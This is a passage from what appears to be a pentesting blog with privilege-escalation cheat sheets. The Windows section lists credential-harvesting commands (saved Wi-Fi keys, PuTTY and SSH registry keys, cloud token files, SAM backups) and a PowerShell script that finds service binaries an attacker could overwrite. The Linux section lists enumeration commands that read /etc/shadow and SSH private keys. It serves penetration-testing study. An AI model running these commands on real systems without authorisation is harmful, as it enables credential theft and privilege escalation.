<SSID> key=clear</span></div><div style="text-align: left;"><span style="font-family: courier;">#Oneliner to extract all wifi passwords</span></div><div style="text-align: left;"><span style="font-family: courier;">cls & echo. & for /f "tokens=4 delims=: " %a in ('netsh wlan show profiles ^| find "Profile "') do @echo off > nul & (netsh wlan show profiles name=%a key=clear | findstr "SSID Cipher Content" | find /v "Number" & echo.) & @echo on</span></div><div style="text-align: left;"><span style="font-family: courier;"><br /></span></div><div style="text-align: left;"><span style="font-family: courier;">::Saved RDP Connections::</span></div><div style="text-align: left;"><span style="font-family: courier;">HKEY_USERS\<SID>\Software\Microsoft\Terminal Server Client\Servers\</span></div><div style="text-align: left;"><span style="font-family: courier;">HKCU\Software\Microsoft\Terminal Server Client\Servers\</span></div><div style="text-align: left;"><span style="font-family: courier;"><br /></span></div><div style="text-align: left;"><span style="font-family: courier;">::Recently Run Commands::</span></div><div style="text-align: left;"><span style="font-family: courier;">HCU\<SID>\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\RunMRU</span></div><div style="text-align: left;"><span style="font-family: courier;">HKCU\<SID>\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\RunMRU</span></div><div style="text-align: left;"><span style="font-family: courier;"><br /></span></div><div style="text-align: left;"><span style="font-family: courier;">::Remote Desktop Credential Manager::</span></div><div style="text-align: left;"><span style="font-family: courier;">%localappdata%\Microsoft\Remote Desktop Connection Manager\RDCMan.settings</span></div><div style="text-align: left;"><span style="font-family: courier;">/* Use the Mimikatz dpapi::rdg module with appropriate /masterkey to decrypt any .rdg files</span></div><div style="text-align: left;"><span 
style="font-family: courier;">You can extract many DPAPI masterkeys from memory with the Mimikatz sekurlsa::dpapi module */</span></div><div style="text-align: left;"><span style="font-family: courier;"><br /></span></div><div style="text-align: left;"><span style="font-family: courier;">:***:Files and Registry (Credentials):***:</span></div><div style="text-align: left;"><span style="font-family: courier;"><br /></span></div><div style="text-align: left;"><span style="font-family: courier;">::Putty Creds::</span></div><div style="text-align: left;"><span style="font-family: courier;">reg query "HKCU\Software\SimonTatham\PuTTY\Sessions" /s | findstr "HKEY_CURRENT_USER HostName PortNumber UserName PublicKeyFile PortForwardings ConnectionSharing ProxyPassword ProxyUsername" #Check the values saved in each session, user/password could be there</span></div><div style="text-align: left;"><span style="font-family: courier;"><br /></span></div><div style="text-align: left;"><span style="font-family: courier;">::Putty SSH Host Keys::</span></div><div style="text-align: left;"><span style="font-family: courier;">reg query HKCU\Software\SimonTatham\PuTTY\SshHostKeys\</span></div><div style="text-align: left;"><span style="font-family: courier;"><br /></span></div><div style="text-align: left;"><span style="font-family: courier;">::SSH keys in registry::</span></div><div style="text-align: left;"><span style="font-family: courier;">reg query HKEY_CURRENT_USER\Software\OpenSSH\Agent\Keys</span></div><div style="text-align: left;"><span style="font-family: courier;"><br /></span></div><div style="text-align: left;"><span style="font-family: courier;">/* If ssh-agent service is not running and you want it to automatically start on boot run: */</span></div><div style="text-align: left;"><span style="font-family: courier;">Get-Service ssh-agent | Set-Service -StartupType Automatic -PassThru | Start-Service</span></div><div style="text-align: left;"><span style="font-family: 
courier;"><br /></span></div><div style="text-align: left;"><span style="font-family: courier;">::Cloud Credentials::</span></div><div style="text-align: left;"><span style="font-family: courier;">##From user home</span></div><div style="text-align: left;"><span style="font-family: courier;">.aws\credentials</span></div><div style="text-align: left;"><span style="font-family: courier;">AppData\Roaming\gcloud\credentials.db</span></div><div style="text-align: left;"><span style="font-family: courier;">AppData\Roaming\gcloud\legacy_credentials</span></div><div style="text-align: left;"><span style="font-family: courier;">AppData\Roaming\gcloud\access_tokens.db</span></div><div style="text-align: left;"><span style="font-family: courier;">.azure\accessTokens.json</span></div><div style="text-align: left;"><span style="font-family: courier;">.azure\azureProfile.json</span></div><div style="text-align: left;"><span style="font-family: courier;"><br /></span></div><div style="text-align: left;"><span style="font-family: courier;">::SAM & SYSTEM backups::</span></div><div style="text-align: left;"><span style="font-family: courier;"># Usually %SYSTEMROOT% = C:\Windows</span></div><div style="text-align: left;"><span style="font-family: courier;">%SYSTEMROOT%\repair\SAM</span></div><div style="text-align: left;"><span style="font-family: courier;">%SYSTEMROOT%\System32\config\RegBack\SAM</span></div><div style="text-align: left;"><span style="font-family: courier;">%SYSTEMROOT%\System32\config\SAM</span></div><div style="text-align: left;"><span style="font-family: courier;">%SYSTEMROOT%\repair\system</span></div><div style="text-align: left;"><span style="font-family: courier;">%SYSTEMROOT%\System32\config\SYSTEM</span></div><div style="text-align: left;"><span style="font-family: courier;">%SYSTEMROOT%\System32\config\RegBack\system</span></div><div style="text-align: left;"><span style="font-family: courier;"><br /></span></div><div style="text-align: left;"><span 
style="font-family: courier;">::Unattended files::</span></div><div style="text-align: left;"><span style="font-family: courier;">C:\Windows\sysprep\sysprep.xml</span></div><div style="text-align: left;"><span style="font-family: courier;">C:\Windows\sysprep\sysprep.inf</span></div><div style="text-align: left;"><span style="font-family: courier;">C:\Windows\sysprep.inf</span></div><div style="text-align: left;"><span style="font-family: courier;">C:\Windows\Panther\Unattended.xml</span></div><div style="text-align: left;"><span style="font-family: courier;">C:\Windows\Panther\Unattend.xml</span></div><div style="text-align: left;"><span style="font-family: courier;">C:\Windows\Panther\Unattend\Unattend.xml</span></div><div style="text-align: left;"><span style="font-family: courier;">C:\Windows\Panther\Unattend\Unattended.xml</span></div><div style="text-align: left;"><span style="font-family: courier;">C:\Windows\System32\Sysprep\unattend.xml</span></div><div style="text-align: left;"><span style="font-family: courier;">C:\Windows\System32\Sysprep\unattended.xml</span></div><div style="text-align: left;"><span style="font-family: courier;">C:\unattend.txt</span></div><div style="text-align: left;"><span style="font-family: courier;">C:\unattend.inf</span></div><div style="text-align: left;"><span style="font-family: courier;">dir /s *sysprep.inf *sysprep.xml *unattended.xml *unattend.xml *unattend.txt 2>nul</span></div><div style="text-align: left;"><span style="font-family: courier;"><br /></span></div><div style="text-align: left;"><span style="font-family: courier;">::IIS Web Config::</span></div><div style="text-align: left;"><span style="font-family: courier;">Get-Childitem -Path C:\inetpub\ -Include web.config -File -Recurse -ErrorAction SilentlyContinue</span></div><div style="text-align: left;"><span style="font-family: courier;"><br /></span></div><div style="text-align: left;"><span style="font-family: 
courier;">C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config</span></div><div style="text-align: left;"><span style="font-family: courier;">C:\inetpub\wwwroot\web.config</span></div><div style="text-align: left;"><span style="font-family: courier;"><br /></span></div><div style="text-align: left;"><span style="font-family: courier;">Get-Childitem -Path C:\xampp\ -Include web.config -File -Recurse -ErrorAction SilentlyContinue</span></div><div style="text-align: left;"><span style="font-family: courier;"><br /></span></div><div style="text-align: left;"><span style="font-family: courier;">/* Example of web.config with credentials: */</span></div><div style="text-align: left;"><span style="font-family: courier;"><authentication mode="Forms"> </span></div><div style="text-align: left;"><span style="font-family: courier;"> <forms name="login" loginUrl="/admin"></span></div><div style="text-align: left;"><span style="font-family: courier;"> <credentials passwordFormat = "Clear"></span></div><div style="text-align: left;"><span style="font-family: courier;"> <user name="Administrator" password="SuperAdminPassword" /></span></div><div style="text-align: left;"><span style="font-family: courier;"> </credentials></span></div><div style="text-align: left;"><span style="font-family: courier;"> </forms></span></div><div style="text-align: left;"><span style="font-family: courier;"></authentication></span></div><div style="text-align: left;"><span style="font-family: courier;"><br /></span></div><div><span style="font-family: courier;"><br /></span></div></code></pre><div><span style="font-family: courier; font-size: large;"><b>==Write Permissions==</b></span></div><pre><code><div><span style="font-family: courier;"><br /></span></div><div style="text-align: left;"><span style="font-family: 
courier;">/* Check whether you can modify a config file that a privileged process reads, or a binary that is executed by an Administrator or SYSTEM account (services, scheduled tasks).</span></div><div style="text-align: left;"><span style="font-family: courier;">One way to find weak folder/file permissions on the system: */</span></div><div style="text-align: left;"><span style="font-family: courier;">accesschk.exe /accepteula </span></div><div style="text-align: left;"><span style="font-family: courier;"># Find all weak folder permissions per drive.</span></div><div style="text-align: left;"><span style="font-family: courier;">accesschk.exe -uwdqs Users c:\</span></div><div style="text-align: left;"><span style="font-family: courier;">accesschk.exe -uwdqs "Authenticated Users" c:\</span></div><div style="text-align: left;"><span style="font-family: courier;">accesschk.exe -uwdqs "Everyone" c:\</span></div><div style="text-align: left;"><span style="font-family: courier;"># Find all weak file permissions per drive.</span></div><div style="text-align: left;"><span style="font-family: courier;">accesschk.exe -uwqs Users c:\*.*</span></div><div style="text-align: left;"><span style="font-family: courier;">accesschk.exe -uwqs "Authenticated Users" c:\*.*</span></div><div style="text-align: left;"><span style="font-family: courier;">accesschk.exe -uwqs "Everyone" c:\*.*</span></div><div style="text-align: left;"><span style="font-family: courier;"><br /></span></div><div style="text-align: left;"><span style="font-family: courier;">icacls "C:\Program Files\*" 2>nul | findstr "(F) (M) :\" | findstr ":\ everyone authenticated users todos %username%"</span></div><div style="text-align: left;"><span style="font-family: courier;">icacls "C:\Program Files (x86)\*" 2>nul | findstr "(F) (M) :\" | findstr ":\ everyone authenticated users todos %username%"</span></div><div style="text-align: left;"><span style="font-family: courier;"><br /></span></div><div 
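style="text-align: left;"><span style="font-family: courier;"></span></div></code></pre><div><span style="font-family: courier;">The accesschk and icacls lines above print ACEs for you to read. What you actually want to know is whether your own token can overwrite something that a privileged service or scheduled task is going to execute. The script below is an added example (my own code, not from the original cheat sheet or the sources it references): it collects the executable behind every service and every non-Microsoft scheduled task, then tests whether any SID in the current token has write-class rights on that file or on its folder. Function names are my own; it assumes Get-ScheduledTask is available (Windows 8 / Server 2012 and later).</span></div>

```powershell
# Added example (my own code, not from the original cheat sheet): rather than
# reading icacls output by eye, test whether the current user, directly or via
# any group in its token, can write to the executable behind each service and
# each non-Microsoft scheduled task, or to the folder holding it. Entries that
# run as SYSTEM or another account are the privilege-escalation targets.
function Get-CurrentTokenSids {
    $id = [Security.Principal.WindowsIdentity]::GetCurrent()
    @($id.User.Value) + @($id.Groups | ForEach-Object { $_.Value })
}

function Test-WritableByCurrentUser {
    param([string]$Path, [string[]]$Sids)
    if (-not $Path -or -not (Test-Path -LiteralPath $Path)) { return $false }
    # Rights that let us replace the file (or drop a file into the folder).
    # Modify and FullControl both contain WriteData, so they match as well.
    $writeMask = [Security.AccessControl.FileSystemRights]'WriteData, AppendData, Delete, ChangePermissions, TakeOwnership'
    try { $acl = Get-Acl -LiteralPath $Path -ErrorAction Stop } catch { return $false }
    foreach ($ace in $acl.Access) {
        # Approximation: explicit Deny ACEs are not evaluated; confirm any hit with a real write.
        if ($ace.AccessControlType -ne 'Allow') { continue }
        try { $sid = $ace.IdentityReference.Translate([Security.Principal.SecurityIdentifier]).Value } catch { continue }
        if (($Sids -contains $sid) -and ([int]($ace.FileSystemRights -band $writeMask) -ne 0)) { return $true }
    }
    return $false
}

function Get-ExecutableFromCommand {
    param([string]$Command)
    if (-not $Command) { return $null }
    $Command = $Command.Trim()
    if ($Command -match '^"([^"]+)"') { $exe = $Matches[1] }              # quoted path
    elseif ($Command -match '^(.+?\.exe)(\s|$)') { $exe = $Matches[1] }   # unquoted, may contain spaces
    else { $exe = ($Command -split '\s+')[0] }
    return [Environment]::ExpandEnvironmentVariables($exe)
}

function Find-WritableServiceOrTaskBinary {
    $sids = Get-CurrentTokenSids
    $targets = @(foreach ($s in Get-CimInstance -ClassName Win32_Service) {
        [pscustomobject]@{ Kind = 'Service'; Name = $s.Name; RunsAs = $s.StartName; Command = $s.PathName }
    })
    # Non-admins only see the tasks they are allowed to read; run again once elevated.
    $targets += @(foreach ($t in Get-ScheduledTask | Where-Object { $_.TaskPath -notlike '\Microsoft*' }) {
        foreach ($a in $t.Actions) {
            if ($a.Execute) {
                [pscustomobject]@{ Kind = 'Task'; Name = $t.TaskPath + $t.TaskName; RunsAs = $t.Principal.UserId; Command = $a.Execute }
            }
        }
    })
    foreach ($t in $targets) {
        $exe = Get-ExecutableFromCommand $t.Command
        if (-not $exe) { continue }
        $dir = Split-Path -Path $exe -Parent
        $exeWritable = Test-WritableByCurrentUser -Path $exe -Sids $sids
        $dirWritable = Test-WritableByCurrentUser -Path $dir -Sids $sids
        if ($exeWritable -or $dirWritable) {
            [pscustomobject]@{
                Kind = $t.Kind; Name = $t.Name; RunsAs = $t.RunsAs; Binary = $exe
                BinaryWritable = $exeWritable; FolderWritable = $dirWritable
            }
        }
    }
}

Find-WritableServiceOrTaskBinary | Format-Table -AutoSize
```

<div><span style="font-family: courier;">A writable folder with a non-writable binary is still interesting: if the binary is missing, or the path is unquoted and contains spaces, you can plant a file that gets picked up first. Treat every hit as a lead, not a result, and confirm with an actual write before building on it.</span></div><pre><code><div 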
style="text-align: left;"><span style="font-family: courier;">Get-ChildItem 'C:\Program Files\*','C:\Program Files (x86)\*' | % { try { Get-Acl $_ -EA SilentlyContinue | Where {($_.Access|select -ExpandProperty IdentityReference) -match 'Everyone'} } catch {}} </span></div><div style="text-align: left;"><span style="font-family: courier;"><br /></span></div><div style="text-align: left;"><span style="font-family: courier;">Get-ChildItem 'C:\Program Files\*','C:\Program Files (x86)\*' | % { try { Get-Acl $_ -EA SilentlyContinue | Where {($_.Access|select -ExpandProperty IdentityReference) -match 'BUILTIN\Users'} } catch {}}</span></div><div style="text-align: left;"><span style="font-family: courier;"><br /></span></div><div><span style="font-family: courier;"><br /></span></div></code></pre><div><span style="font-family: courier; font-size: medium;"><b>Note: To be continued....</b></span></div><div><span style="font-family: courier; font-size: medium;"><b><br /></b></span></div><div style="text-align: left;"><span style="font-family: courier;"><b>References:</b></span></div><div style="text-align: left;"><div><a href="https://book.hacktricks.xyz/windows/windows-local-privilege-escalation"><span style="font-family: arial; font-size: x-small;">https://book.hacktricks.xyz/windows/windows-local-privilege-escalation</span></a></div><div><a href="https://pentest.blog/windows-privilege-escalation-methods-for-pentesters/"><span style="font-family: arial; font-size: x-small;">https://pentest.blog/windows-privilege-escalation-methods-for-pentesters/</span></a></div><div><a href="http://www.fuzzysecurity.com/tutorials/16.html"><span style="font-family: arial; font-size: x-small;">http://www.fuzzysecurity.com/tutorials/16.html</span></a></div><div><a href="https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Privilege%20Escalation.md"><span style="font-family: arial; font-size: 
x-small;">https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Privilege%20Escalation.md</span></a></div></div></div>TheShahzadahttp://www.blogger.com/profile/01405567763403009941noreply@blogger.com0tag:blogger.com,1999:blog-1395592345970778383.post-86025595166610299162021-01-25T16:26:00.007+06:002021-02-27T11:17:37.609+06:00Linux Privilege Escalation<p style="text-align: center;"><span style="font-family: courier; font-size: large;"><b><br /></b></span></p><p style="text-align: center;"><span style="font-family: courier; font-size: large;"><b>Linux Enumeration for Root Privilege Escalation</b></span></p><p><span style="font-family: courier; font-size: large;"></span></p><div style="text-align: center;"><span style="font-family: courier; font-size: large;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgfTXjx8SuOq-vHWXtwQ9YijTqn0_SUYlWYJDs1zN0334s256mX82VrDF0OhjrWN6Y65FG_GZOTP8rkgI_5xUxyJ_YcA2v7J4izNCnGz3JgLTAOIrrHwcvWVWcue7kabz5cUWpa9ji8IVs/s1920/Linux+Privilege+Escalation.png"><img border="0" data-original-height="1200" data-original-width="1920" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgfTXjx8SuOq-vHWXtwQ9YijTqn0_SUYlWYJDs1zN0334s256mX82VrDF0OhjrWN6Y65FG_GZOTP8rkgI_5xUxyJ_YcA2v7J4izNCnGz3JgLTAOIrrHwcvWVWcue7kabz5cUWpa9ji8IVs/s16000/Linux+Privilege+Escalation.png" /></a></span></div><p></p><p><span style="font-family: courier; font-size: medium;"> <b>=== Operating System ===</b></span></p><p><span style="font-family: courier; font-size: medium;"><b>## What's the distribution type? 
What version?</b></span></p><pre><code><p><span style="font-family: courier; font-size: medium;">cat /etc/issue</span></p><p><span style="font-family: courier; font-size: medium;">cat /etc/*-release</span></p><p><span style="font-family: courier; font-size: medium;">cat /etc/lsb-release</span></p><p><span style="font-family: courier; font-size: medium;">cat /etc/redhat-release</span></p><p><span style="font-family: courier; font-size: medium;"> </span></p><p><span style="font-family: courier; font-size: medium;">uname -n // System hostname</span></p><p><span style="font-family: courier; font-size: medium;">hostname // As above</span></p></code></pre><p><span style="font-family: courier; font-size: medium;"><b>## What's the Kernel version? Is it 64-bit?</b></span></p><pre><code><p><span style="font-family: courier; font-size: medium;">cat /proc/version </span></p><p><span style="font-family: courier; font-size: medium;">uname -a</span></p><p><span style="font-family: courier; font-size: medium;">uname -r // Kernel release</span></p><p><span style="font-family: courier; font-size: medium;">uname -mrs // Machine type, kernel release and kernel name</span></p><p><span style="font-family: courier; font-size: medium;">rpm -q kernel </span></p><p><span style="font-family: courier; font-size: medium;">dmesg | grep Linux</span></p><p><span style="font-family: courier; font-size: medium;">ls /boot | grep vmlinuz-</span></p><p><span style="font-family: courier; font-size: medium;">cat /proc/cpuinfo // CPU information</span></p></code></pre><p><span style="font-family: courier; font-size: medium;"> <b>=== What can be learnt from the environmental variables? 
===</b></span></p><pre><code><p><span style="font-family: courier; font-size: medium;">cat /etc/profile</span></p><p><span style="font-family: courier; font-size: medium;">cat /etc/bashrc</span></p><p><span style="font-family: courier; font-size: medium;">cat ~/.bash_profile</span></p><p><span style="font-family: courier; font-size: medium;">cat ~/.bashrc</span></p><p><span style="font-family: courier; font-size: medium;">cat ~/.bash_logout</span></p><p><span style="font-family: courier; font-size: medium;">env</span></p><p><span style="font-family: courier; font-size: medium;">set</span></p></code></pre><p><span style="font-family: courier; font-size: medium;"> <b> === Is there a printer? ===</b></span></p><pre><code><p><span style="font-family: courier; font-size: medium;">lpstat -a</span></p></code></pre><p><span style="font-family: courier; font-size: medium;"> <b>=== Users & Groups: === </b></span></p><pre><code><p><span style="font-family: courier; font-size: medium;">cat /etc/passwd // List all users on the system</span></p><p><span style="font-family: courier; font-size: medium;">cat /etc/group // List all groups on the system</span></p><p><span style="font-family: courier; font-size: medium;">cat /etc/shadow // Show user hashes - Privileged command</span></p><p><span style="font-family: courier; font-size: medium;">grep -v -E "^#" /etc/passwd | awk -F: '$3 == 0 { print $1}' // List all super user accounts (UID 0)</span></p><p><span style="font-family: courier; font-size: medium;">finger // Users currently logged in</span></p><p><span style="font-family: courier; font-size: medium;">pinky // As above</span></p><p><span style="font-family: courier; font-size: medium;">users // As above</span></p><p><span style="font-family: courier; font-size: medium;">who -a // As above</span></p><p><span style="font-family: courier; font-size: medium;">w // Who is currently logged in and what they're doing</span></p><p><span style="font-family: courier; font-size: medium;">last // Listing of last logged on 
users</span></p><p><span style="font-family: courier; font-size: medium;">lastlog // Information on when all users last logged in</span></p><p><span style="font-family: courier; font-size: medium;">lastlog --user root // Information on when the specified user last logged in</span></p><p><span style="font-family: courier; font-size: medium;"><br /></span></p></code></pre><p><span style="font-family: courier; font-size: medium;"> <b>=== User & Privilege Information: ===</b></span></p><pre><code><p><span style="font-family: courier; font-size: medium;"><br /></span></p><p><span style="font-family: courier; font-size: medium;">whoami </span></p><p><span style="font-family: courier; font-size: medium;">id </span></p><p><span style="font-family: courier; font-size: medium;">cat /etc/sudoers // Who's allowed to do what as root - Privileged command</span></p><p><span style="font-family: courier; font-size: medium;">sudo -l // Can the current user perform anything as root</span></p><p><span style="font-family: courier; font-size: medium;">cut -d: -f1 /etc/passwd # List of users</span></p><p><span style="font-family: courier; font-size: medium;">grep -v -E "^#" /etc/passwd | awk -F: '$3 == 0 { print $1}' # List of super users</span></p><p><span style="font-family: courier; font-size: medium;">awk -F: '($3 == "0") {print}' /etc/passwd # List of super users</span></p><p><span style="font-family: courier; font-size: medium;"><br /></span></p></code></pre><p><span style="font-family: courier; font-size: medium;">## What has the user been doing? Are there any passwords in plain text? 
What have they been editing?</span></p><pre><code><p><span style="font-family: courier; font-size: medium;">cat ~/.bash_history</span></p><p><span style="font-family: courier; font-size: medium;">cat ~/.nano_history</span></p><p><span style="font-family: courier; font-size: medium;">cat ~/.atftp_history</span></p><p><span style="font-family: courier; font-size: medium;">cat ~/.mysql_history </span></p><p><span style="font-family: courier; font-size: medium;">cat ~/.php_history</span></p><p><span style="font-family: courier; font-size: medium;"><br /></span></p><p><span style="font-family: courier; font-size: medium;"><br /></span></p></code></pre><p><span style="font-family: courier; font-size: medium;"><b>## What user information can be found? </b></span></p><pre><code><p><span style="font-family: courier; font-size: medium;">cat ~/.bashrc</span></p><p><span style="font-family: courier; font-size: medium;">cat ~/.profile</span></p><p><span style="font-family: courier; font-size: medium;">cat /var/mail/root</span></p><p><span style="font-family: courier; font-size: medium;">cat /var/spool/mail/root</span></p><p><span style="font-family: courier; font-size: medium;"><br /></span></p></code></pre><p><span style="font-family: courier; font-size: medium;"><b>## Which service(s) are being run by root? Of these services, which are vulnerable? It's worth a double check!</b></span></p><pre><code><p><span style="font-family: courier; font-size: medium;">ps aux | grep root</span></p><p><span style="font-family: courier; font-size: medium;">ps -ef | grep root</span></p><p><span style="font-family: courier; font-size: medium;"><br /></span></p><p><span style="font-family: courier; font-size: medium;"><br /></span></p></code></pre><p><span style="font-family: courier; font-size: medium;"><b>## What applications are installed? What version are they? Are they currently running?</b></span></p><pre><code><p><span style="font-family: courier; font-size: medium;">ls -alh /usr/bin/</span></p><p><span style="font-family: courier; font-size: medium;">ls -alh /sbin/</span></p><p><span style="font-family: courier; font-size: medium;">dpkg -l</span></p><p><span style="font-family: courier; font-size: medium;">rpm -qa</span></p><p><span style="font-family: courier; font-size: medium;">ls -alh /var/cache/apt/archives</span></p><p><span style="font-family: courier; font-size: medium;">ls -alh /var/cache/yum/ </span></p><p><span style="font-family: courier; font-size: medium;"><br /></span></p></code></pre><p><span style="font-family: courier; font-size: medium;"> <b>=== Environmental Information: ===</b></span></p><pre><code><p><span style="font-family: courier; font-size: medium;"><br /></span></p><p><span style="font-family: courier; font-size: medium;">env // Display environmental variables</span></p><p><span style="font-family: courier; font-size: medium;">set // As above</span></p><p><span style="font-family: courier; font-size: medium;">echo $PATH // Path information</span></p><p><span style="font-family: courier; font-size: medium;">history // Displays command history of current user</span></p><p><span style="font-family: courier; font-size: medium;">cat /etc/profile // Display default system variables</span></p><p><span style="font-family: courier; font-size: medium;"><br /></span></p></code></pre><p><span style="font-family: courier; font-size: medium;"><br /></span></p><p><span style="font-family: courier; font-size: medium;"> <b>=== Any of the service(s) settings misconfigured? Are any (vulnerable) plugins attached? 
===</b></span></p><pre><code><p><span style="font-family: courier; font-size: medium;">cat /etc/syslog.conf </span></p><p><span style="font-family: courier; font-size: medium;">cat /etc/chttp.conf</span></p><p><span style="font-family: courier; font-size: medium;">cat /etc/lighttpd.conf</span></p><p><span style="font-family: courier; font-size: medium;">cat /etc/cups/cupsd.conf </span></p><p><span style="font-family: courier; font-size: medium;">cat /etc/inetd.conf </span></p><p><span style="font-family: courier; font-size: medium;">cat /etc/apache2/apache2.conf</span></p><p><span style="font-family: courier; font-size: medium;">cat /etc/my.conf</span></p><p><span style="font-family: courier; font-size: medium;">cat /etc/httpd/conf/httpd.conf</span></p><p><span style="font-family: courier; font-size: medium;">cat /opt/lampp/etc/httpd.conf</span></p><p><span style="font-family: courier; font-size: medium;">ls -aRl /etc/ | awk '$1 ~ /^.*r.*/' 2>/dev/null // Readable entries under /etc</span></p><p><span style="font-family: courier; font-size: medium;"><br /></span></p><p><span style="font-family: courier; font-size: medium;">ps aux | grep root // View services running as root</span></p><p><span style="font-family: courier; font-size: medium;">cat /etc/inetd.conf // List services managed by inetd</span></p><p><span style="font-family: courier; font-size: medium;">cat /etc/xinetd.conf // As above for xinetd</span></p><p><span style="font-family: courier; font-size: medium;"><br /></span></p><p><span style="font-family: courier; font-size: medium;"><br /></span></p></code></pre><p><span style="font-family: courier; font-size: medium;"> <b>=== Installed programs === </b></span></p><pre><code><p><span style="font-family: courier; font-size: medium;">dpkg -l // Installed packages (Debian)</span></p><p><span style="font-family: courier; font-size: medium;">rpm -qa // Installed packages (Red Hat)</span></p><p><span style="font-family: courier; font-size: medium;">sudo -V // Sudo version - does an exploit exist?</span></p><p><span style="font-family: courier; font-size: medium;">httpd -v // Apache version</span></p><p><span style="font-family: courier; font-size: medium;">apache2 -v // As above</span></p><p><span style="font-family: courier; font-size: medium;">apache2ctl (or apachectl) -M // List loaded Apache modules</span></p><p><span style="font-family: courier; font-size: medium;">mysql --version // Installed MySQL version details</span></p><p><span style="font-family: courier; font-size: medium;">perl -v // Installed Perl version details</span></p><p><span style="font-family: courier; font-size: medium;">java -version // Installed Java version details</span></p><p><span style="font-family: courier; font-size: medium;">python --version // Installed Python version details</span></p><p><span style="font-family: courier; font-size: medium;">ruby -v // Installed Ruby version details</span></p><p><span style="font-family: courier; font-size: medium;">find / -name %program_name% 2>/dev/null // Locate "useful" programs (i.e. nc, netcat, wget, nmap etc)</span></p><p><span style="font-family: courier; font-size: medium;">which %program_name% // As above</span></p><p><span style="font-family: courier; font-size: medium;"><br /></span></p></code></pre><p><span style="font-family: courier; font-size: medium;"> <b>=== SSH info ? ===</b></span></p><pre><code><p><span style="font-family: courier; font-size: medium;"><b>## Can private-key information be found? 
</b></span></p><p><span style="font-family: courier; font-size: medium;">cat ~/.ssh/authorized_keys</span></p><p><span style="font-family: courier; font-size: medium;">cat ~/.ssh/identity.pub</span></p><p><span style="font-family: courier; font-size: medium;">cat ~/.ssh/identity</span></p><p><span style="font-family: courier; font-size: medium;">cat ~/.ssh/id_rsa.pub</span></p><p><span style="font-family: courier; font-size: medium;">cat ~/.ssh/id_rsa</span></p><p><span style="font-family: courier; font-size: medium;">cat ~/.ssh/id_dsa.pub</span></p><p><span style="font-family: courier; font-size: medium;">cat ~/.ssh/id_dsa</span></p><p><span style="font-family: courier; font-size: medium;">cat /etc/ssh/ssh_config</span></p><p><span style="font-family: courier; font-size: medium;">cat /etc/ssh/sshd_config</span></p><p><span style="font-family: courier; font-size: medium;">cat /etc/ssh/ssh_host_dsa_key.pub</span></p><p><span style="font-family: courier; font-size: medium;">cat /etc/ssh/ssh_host_dsa_key</span></p><p><span style="font-family: courier; font-size: medium;">cat /etc/ssh/ssh_host_rsa_key.pub</span></p><p><span style="font-family: courier; font-size: medium;">cat /etc/ssh/ssh_host_rsa_key</span></p><p><span style="font-family: courier; font-size: medium;">cat /etc/ssh/ssh_host_key.pub</span></p><p><span style="font-family: courier; font-size: medium;">cat /etc/ssh/ssh_host_key</span></p><p><span style="font-family: courier; font-size: medium;"><br /></span></p><p><span style="font-family: courier; font-size: medium;"><br /></span></p></code></pre><p><span style="font-family: courier; font-size: medium;"> <b>=== Jobs/Tasks: ===</b></span></p><pre><code><p><span style="font-family: courier; font-size: medium;"><br /></span></p><p><span style="font-family: courier; font-size: medium;">crontab -l -u %username% // Display scheduled jobs for the specified user - Privileged command</span></p><p><span style="font-family: courier; font-size: medium;">ls -la /etc/cron* // Scheduled jobs overview (hourly, daily, monthly etc)</span></p><p><span style="font-family: courier; font-size: medium;">ls -aRl /etc/cron* | awk '$1 ~ /w.$/' 2>/dev/null // What can "others" write in /etc/cron* directories</span></p><p><span style="font-family: courier; font-size: medium;">ls -alh /var/spool/cron</span></p><p><span style="font-family: courier; font-size: medium;">ls -al /etc/ | grep cron</span></p><p><span style="font-family: courier; font-size: medium;">cat /etc/cron* 2>/dev/null</span></p><p><span style="font-family: courier; font-size: medium;">cat /etc/at.allow</span></p><p><span style="font-family: courier; font-size: medium;">cat /etc/at.deny</span></p><p><span style="font-family: courier; font-size: medium;">cat /etc/cron.allow</span></p><p><span style="font-family: courier; font-size: medium;">cat /etc/cron.deny</span></p><p><span style="font-family: courier; font-size: medium;">cat /etc/crontab</span></p><p><span style="font-family: courier; font-size: medium;">ls -alh /etc/cron.daily</span></p><p><span style="font-family: courier; font-size: medium;">ls -alh /etc/cron.weekly</span></p><p><span style="font-family: courier; font-size: medium;">ls -alh /etc/cron.monthly</span></p><p><span style="font-family: courier; font-size: medium;">cat /etc/anacrontab</span></p><p><span style="font-family: courier; font-size: medium;">cat /var/spool/cron/crontabs/root</span></p><p><span style="font-family: courier; font-size: medium;"><br /></span></p></code></pre><p><span style="font-family: courier; font-size: medium;"> <b>=== Interesting Files: ===</b></span></p><pre><code><p><span style="font-family: courier; font-size: medium;"><br /></span></p><p><span style="font-family: courier; font-size: medium;">find /home -name .rhosts -print 2>/dev/null // Find rhosts config files</span></p><p><span style="font-family: courier; font-size: medium;">ls -ahlR /root/ // See if you can access other user directories to find interesting files - Privileged command</span></p><p><span style="font-family: courier; font-size: medium;">cat ~/.bash_history // Show the current user's command history</span></p><p><span style="font-family: courier; font-size: medium;">ls -la ~/.*_history // Show the current user's various history files</span></p><p><span style="font-family: courier; font-size: medium;">ls -la ~/.ssh/ // Check for interesting ssh files in the current user's directory</span></p><p><span style="font-family: courier; font-size: medium;">ls -la /usr/sbin/in.* // Check configuration of inetd services</span></p><p><span style="font-family: courier; font-size: medium;">find /var/log -type f -exec ls -la {} \; 2>/dev/null // List files in specified directory (/var/log)</span></p><p><span style="font-family: courier; font-size: medium;">find /var/log -name "*.log" -type f -exec ls -la {} \; 2>/dev/null // List .log files in specified directory (/var/log)</span></p><p><span style="font-family: courier; font-size: medium;">find /etc/ -maxdepth 1 -name "*.conf" -type f -exec ls -la {} \; 2>/dev/null // List .conf files in /etc (recursive 1 level)</span></p><p><span style="font-family: courier; font-size: medium;">ls -la /etc/*.conf // As above</span></p><p><span style="font-family: courier; font-size: medium;">lsof -i -n ## List open network files (output will depend on account privileges)</span></p><p><span style="font-family: courier; font-size: medium;">lsof -u root ## List all open files and processes of user root</span></p><p><span style="font-family: courier; font-size: medium;"><br /></span></p></code></pre><p><span style="font-family: 